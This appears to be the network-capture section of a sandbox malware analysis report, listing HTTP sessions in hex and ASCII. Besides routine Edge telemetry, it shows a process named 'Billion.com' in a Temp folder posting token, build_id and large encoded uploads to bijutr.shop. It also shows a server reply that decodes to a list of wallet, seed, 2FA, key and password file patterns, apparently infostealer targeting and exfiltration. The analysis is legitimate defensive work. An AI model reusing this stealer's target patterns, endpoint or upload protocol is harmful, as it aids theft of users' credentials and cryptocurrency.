                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:43 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 52 51 39 5a 43 42 41 31 4e 37 51 51 51 49 35 58 54 30 48 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 39 36 35 34 63 33 62 63 63 37 33 33 30 65 31 39 35 34 63 61 66 64 33 34 35 34 65 63 34 34 0d 0a 2d 2d 2d 2d 2d 2d 52 51 39 5a 43 42 41 31 4e 37 51 51 51 49 35 58 54 30 48 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 52 51 39 5a 43 42 41 31 4e 37 51 51 51 49 35 58 54 30 48 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                        Data Ascii: ------RQ9ZCBA1N7QQQI5XT0H4Content-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------RQ9ZCBA1N7QQQI5XT0H4Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------RQ9ZCBA1N7QQQI5XT0H4Cont
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:44 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:44 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:44 UTC1524INData Raw: 35 65 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                                                                                                                                                                                                                                        Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        46192.168.2.65007920.189.173.24437060C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:43 UTC1060OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735064921021&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 5371
                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                        Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                        Cookie: USRLOC=; MUID=302665E99E416E3C182470B69FCB6F6B; _EDGE_S=F=1&SID=0DE3EBFAB5BE6BFF1F65FEA5B4FF6AFE; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:43 UTC5371OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 34 54 31 38 3a 32 38 3a 34 31 2e 30 32 31 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 65 66 34 38 64 30 61 64 2d 39 65 62 30 2d 34 64 66 33 2d 62 63 36 62 2d 35 63 31 32 33 31 64 39 32 33 62 39 22 2c 22 65 70 6f 63 68 22 3a 22 33 36 30 31 37 35 39 37 30 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                        Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-24T18:28:41.021Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"ef48d0ad-9eb0-4df3-bc6b-5c1231d923b9","epoch":"3601759707"},"app":{"locale
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:44 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                        P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                        Set-Cookie: MC1=GUID=7cfa92acd35f4775b018ad71d4ae2aa0&HASH=7cfa&LV=202412&V=4&LU=1735064923993; Domain=.microsoft.com; Expires=Wed, 24 Dec 2025 18:28:43 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                        Set-Cookie: MS0=a0df12bcc0c74c40980250217acdef22; Domain=.microsoft.com; Expires=Tue, 24 Dec 2024 18:58:43 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                        time-delta-millis: 2972
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:43 GMT
                                                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        47192.168.2.65008120.189.173.24437060C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:43 UTC1060OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735064921170&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 9827
                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                        Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                        Cookie: USRLOC=; MUID=302665E99E416E3C182470B69FCB6F6B; _EDGE_S=F=1&SID=0DE3EBFAB5BE6BFF1F65FEA5B4FF6AFE; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:43 UTC9827OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 34 54 31 38 3a 32 38 3a 34 31 2e 31 36 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 65 66 34 38 64 30 61 64 2d 39 65 62 30 2d 34 64 66 33 2d 62 63 36 62 2d 35 63 31 32 33 31 64 39 32 33 62 39 22 2c 22 65 70 6f 63 68 22 3a 22 33 36 30 31 37 35 39 37 30 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                                                                                                                                                        Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-24T18:28:41.169Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"ef48d0ad-9eb0-4df3-bc6b-5c1231d923b9","epoch":"3601759707"},"app":{"loc
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:44 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                        P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                        Set-Cookie: MC1=GUID=dd9984778ef74de9a608d4fb2f9814a0&HASH=dd99&LV=202412&V=4&LU=1735064924588; Domain=.microsoft.com; Expires=Wed, 24 Dec 2025 18:28:44 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                        Set-Cookie: MS0=52f908f8da6942a7ab29715bd266243b; Domain=.microsoft.com; Expires=Tue, 24 Dec 2024 18:58:44 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                        time-delta-millis: 3418
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:44 GMT
                                                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        48192.168.2.650087188.245.216.2054431396C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:45 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----0ZUSR1VAI58QQI5XT2DJ
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 453
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:45 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 30 5a 55 53 52 31 56 41 49 35 38 51 51 49 35 58 54 32 44 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 39 36 35 34 63 33 62 63 63 37 33 33 30 65 31 39 35 34 63 61 66 64 33 34 35 34 65 63 34 34 0d 0a 2d 2d 2d 2d 2d 2d 30 5a 55 53 52 31 56 41 49 35 38 51 51 49 35 58 54 32 44 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 30 5a 55 53 52 31 56 41 49 35 38 51 51 49 35 58 54 32 44 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                        Data Ascii: ------0ZUSR1VAI58QQI5XT2DJContent-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------0ZUSR1VAI58QQI5XT2DJContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------0ZUSR1VAI58QQI5XT2DJCont
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:46 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:46 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        49192.168.2.650094188.245.216.2054431396C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:48 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----TJ5X4EUSR1NYMY5FC2VS
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 98329
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:48 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 54 4a 35 58 34 45 55 53 52 31 4e 59 4d 59 35 46 43 32 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 39 36 35 34 63 33 62 63 63 37 33 33 30 65 31 39 35 34 63 61 66 64 33 34 35 34 65 63 34 34 0d 0a 2d 2d 2d 2d 2d 2d 54 4a 35 58 34 45 55 53 52 31 4e 59 4d 59 35 46 43 32 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 54 4a 35 58 34 45 55 53 52 31 4e 59 4d 59 35 46 43 32 56 53 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                        Data Ascii: ------TJ5X4EUSR1NYMY5FC2VSContent-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------TJ5X4EUSR1NYMY5FC2VSContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------TJ5X4EUSR1NYMY5FC2VSCont
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:48 UTC16355OUTData Raw: 55 55 55 55 41 46 46 46 46 41 42 53 55 74 46 41 43 55 55 55 55 41 46 4a 53 30 55 41 4a 52 52 52 51 41 55 6c 4c 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 42 6f 6f 4e 41 43 55 55 55 55 41 46 46 46 46 41 43 55 55 74 4a 51 41 6c 46 4c 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 53 47 6c 70 44 51 41 55 55 55 55 41 46 4a 53 30 6c 41 42 51 61 4b 4b 41 45 6f 70 61 53 67 41 6f 6f 6f 6f 41 4b 53 6c 6f 6f 41 53 69 69 69 67 42 4b 4b 57 6b 6f 41 4b 4b 4b 4b 41 45 6f 6f 6f 6f 41 4b 53 6c 70 4b 41 43 6b 70 61 53 67 41 6f 6f 6f 6f 41 31 36 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 53 76 4d 66 69 55 76 38 41 59 2f 69 7a 77 78 34 6d 58 68 49 70 78 62 7a 74 2f 73 35 7a 2f
                                                                                                                                                                                                                                                                                                        Data Ascii: UUUUAFFFFABSUtFACUUUUAFJS0UAJRRRQAUlLRQAlFFFABRRRQAUUUUAFBooNACUUUUAFFFFACUUtJQAlFLRQAlFFFABRRRQAlFFFABRRRQAlFFFABRRRQAlFFFABSGlpDQAUUUUAFJS0lABQaKKAEopaSgAooooAKSlooASiiigBKKWkoAKKKKAEooooAKSlpKACkpaSgAooooA16KKKACiiigAooooASvMfiUv8AY/izwx4mXhIpxbzt/s5z/
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:48 UTC16355OUTData Raw: 58 74 35 66 52 74 48 6d 5a 34 57 4f 6c 7a 56 62 64 69 56 66 61 70 56 2b 74 51 67 31 49 44 58 71 4a 48 46 59 6e 55 38 31 4b 6f 79 61 69 58 72 55 79 34 37 35 6f 73 5a 76 79 46 78 6e 33 71 49 75 38 54 5a 51 6b 56 30 57 6c 65 48 70 62 77 43 57 34 4a 53 49 39 42 33 4e 64 52 44 34 61 30 6c 49 67 72 57 6f 6b 39 53 35 35 72 68 72 59 36 6c 42 38 75 35 32 55 73 42 55 71 4b 37 30 4f 4a 73 72 78 5a 78 74 59 34 63 56 63 48 31 72 62 31 48 77 66 61 4d 50 4f 73 43 59 5a 6c 35 41 37 47 73 44 4d 6b 55 6a 52 54 4c 74 6b 55 34 59 56 35 39 53 74 43 57 73 54 48 45 59 57 56 46 33 65 78 4d 4b 73 78 4e 7a 56 51 4e 79 4b 6d 6a 50 4e 65 64 56 6c 71 63 36 4e 69 32 63 35 46 62 31 72 4a 6c 4b 35 6d 32 62 70 57 37 5a 53 56 77 54 33 4c 6a 6f 58 37 75 50 7a 37 4f 52 44 32 55 6b 66 57 75
                                                                                                                                                                                                                                                                                                        Data Ascii: Xt5fRtHmZ4WOlzVbdiVfapV+tQg1IDXqJHFYnU81KoyaiXrUy475osZvyFxn3qIu8TZQkV0WleHpbwCW4JSI9B3NdRD4a0lIgrWok9S55rhrY6lB8u52UsBUqK70OJsrxZxtY4cVcH1rb1HwfaMPOsCYZl5A7GsDMkUjRTLtkU4YV59StCWsTHEYWVF3exMKsxNzVQNyKmjPNedVlqc6Ni2c5Fb1rJlK5m2bpW7ZSVwT3LjoX7uPz7ORD2UkfWu
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:48 UTC16355OUTData Raw: 4c 77 73 59 6a 79 55 75 4a 6c 7a 39 4a 47 72 71 5a 66 38 41 56 50 37 71 66 35 56 7a 50 77 2f 50 2f 45 69 6e 2f 77 43 76 79 66 38 41 39 47 4e 51 42 31 66 57 69 6c 48 53 69 67 42 4b 4b 4b 4b 41 43 6b 6f 70 61 41 45 78 53 55 74 4c 51 41 32 6b 7a 54 73 55 6d 4b 41 4f 48 31 35 64 33 6a 37 54 51 41 54 2b 37 42 50 48 75 61 36 31 77 32 7a 39 32 71 37 6a 30 7a 58 4f 61 68 6b 66 45 4b 7a 32 70 76 50 32 5a 75 50 7a 72 6f 50 4e 75 63 38 32 35 78 37 4d 4b 74 45 4d 57 52 6c 69 69 33 4f 42 6e 67 48 61 4b 52 49 59 34 77 46 7a 79 54 6e 6b 30 65 5a 50 2f 77 41 2b 72 66 38 41 66 61 31 45 42 4f 58 4c 79 51 4d 78 42 79 76 7a 44 69 71 4a 4c 47 7a 50 51 44 30 36 30 30 49 33 6e 4e 6b 4c 73 2f 68 48 70 51 5a 4a 2b 76 32 5a 76 2b 2b 68 52 35 73 2f 48 2b 6a 4e 7a 2f 74 69 67 43 4e
                                                                                                                                                                                                                                                                                                        Data Ascii: LwsYjyUuJlz9JGrqZf8AVP7qf5VzPw/P/Ein/wCvyf8A9GNQB1fWilHSigBKKKKACkopaAExSUtLQA2kzTsUmKAOH15d3j7TQAT+7BPHua61w2z92q7j0zXOahkfEKz2pvP2ZuPzroPNuc825x7MKtEMWRlii3OBngHaKRIY4wFzyTnk0eZP/wA+rf8Afa1EBOXLyQMxByvzDiqJLGzPQD0600I3nNkLs/hHpQZJ+v2Zv++hR5s/H+jNz/tigCN
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:48 UTC16355OUTData Raw: 70 78 64 6d 6d 4e 53 6c 73 39 6a 48 62 56 72 39 4a 4d 4e 5a 6c 6c 55 34 4f 31 54 79 66 38 4d 59 71 5a 74 59 6d 55 74 2f 6f 45 70 41 58 63 4d 44 72 57 76 67 65 67 78 52 67 65 67 34 36 56 73 68 47 44 4c 72 56 32 34 68 4d 46 6c 49 43 78 47 34 4d 4f 67 72 63 58 4a 55 45 39 78 54 73 44 47 4f 50 79 6f 41 34 70 67 4a 53 5a 70 39 4a 69 67 44 6b 37 67 2f 38 58 4c 73 76 2b 76 52 76 36 31 31 31 63 66 65 6e 62 38 53 62 48 2f 72 30 62 2b 74 64 50 35 68 39 61 41 4c 4f 52 54 66 78 71 44 7a 50 65 6b 33 6d 67 43 63 39 61 53 6f 64 35 6f 38 77 30 41 53 45 6d 6d 6d 6f 7a 49 61 54 64 51 41 2b 6b 4a 46 4d 4a 4e 4d 4c 55 41 50 4c 55 77 6d 6d 46 36 4e 31 41 44 73 30 30 6d 6d 6c 71 61 57 6f 41 63 54 54 53 61 61 54 52 6e 69 67 42 63 30 32 6b 7a 53 5a 6f 41 55 6d 6d 35 70 43 61 54
                                                                                                                                                                                                                                                                                                        Data Ascii: pxdmmNSls9jHbVr9JMNZllU4O1Tyf8MYqZtYmUt/oEpAXcMDrWvgegxRgeg46VshGDLrV24hMFlICxG4MOgrcXJUE9xTsDGOPyoA4pgJSZp9JigDk7g/8XLsv+vRv6111cfenb8SbH/r0b+tdP5h9aALORTfxqDzPek3mgCc9aSod5o8w0ASEmmmozIaTdQA+kJFMJNMLUAPLUwmmF6N1ADs00mmlqaWoAcTTSaaTRnigBc02kzSZoAUmm5pCaT
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:48 UTC16355OUTData Raw: 62 49 78 42 4f 4e 78 50 4a 78 6e 6a 50 51 64 4b 35 71 34 73 45 66 79 78 4e 6f 31 33 4a 72 69 36 74 48 4a 4c 64 69 31 63 35 69 2b 30 41 67 2b 62 6a 42 51 4a 74 2b 58 4a 78 6a 6f 4e 75 51 66 61 53 44 70 63 39 45 71 43 30 76 49 4c 36 45 7a 57 30 6d 2b 4d 4f 38 5a 4f 43 50 6d 56 69 72 44 6e 30 49 49 72 68 6c 74 35 70 2f 47 46 6e 64 4a 70 51 67 6b 2b 33 53 72 63 46 64 4e 6c 44 6d 50 5a 49 75 58 75 53 64 72 71 33 79 6b 4b 42 67 5a 55 5a 34 35 62 46 59 57 2b 6e 36 4a 4c 59 4c 6f 4b 4b 57 31 47 58 37 51 58 30 75 53 61 4e 55 33 79 4e 47 78 6a 51 44 7a 6c 78 74 41 77 53 46 79 44 78 6a 46 48 53 34 33 76 62 2b 75 76 38 41 6b 65 68 55 56 7a 2f 67 75 47 65 33 38 4f 72 44 50 45 30 57 79 34 6e 38 74 47 68 61 45 42 50 4d 59 72 68 47 4a 4b 72 6a 47 42 6b 34 47 4b 36 43 68
                                                                                                                                                                                                                                                                                                        Data Ascii: bIxBONxPJxnjPQdK5q4sEfyxNo13Jri6tHJLdi1c5i+0Ag+bjBQJt+XJxjoNuQfaSDpc9EqC0vIL6EzW0m+MO8ZOCPmVirDn0IIrhlt5p/GFndJpQgk+3SrcFdNlDmPZIuXuSdrq3ykKBgZUZ45bFYW+n6JLYLoKKW1GX7QX0uSaNU3yNGxjQDzlxtAwSFyDxjFHS43vb+uv8AkehUVz/guGe38OrDPE0Wy4n8tGhaEBPMYrhGJKrjGBk4GK6Ch
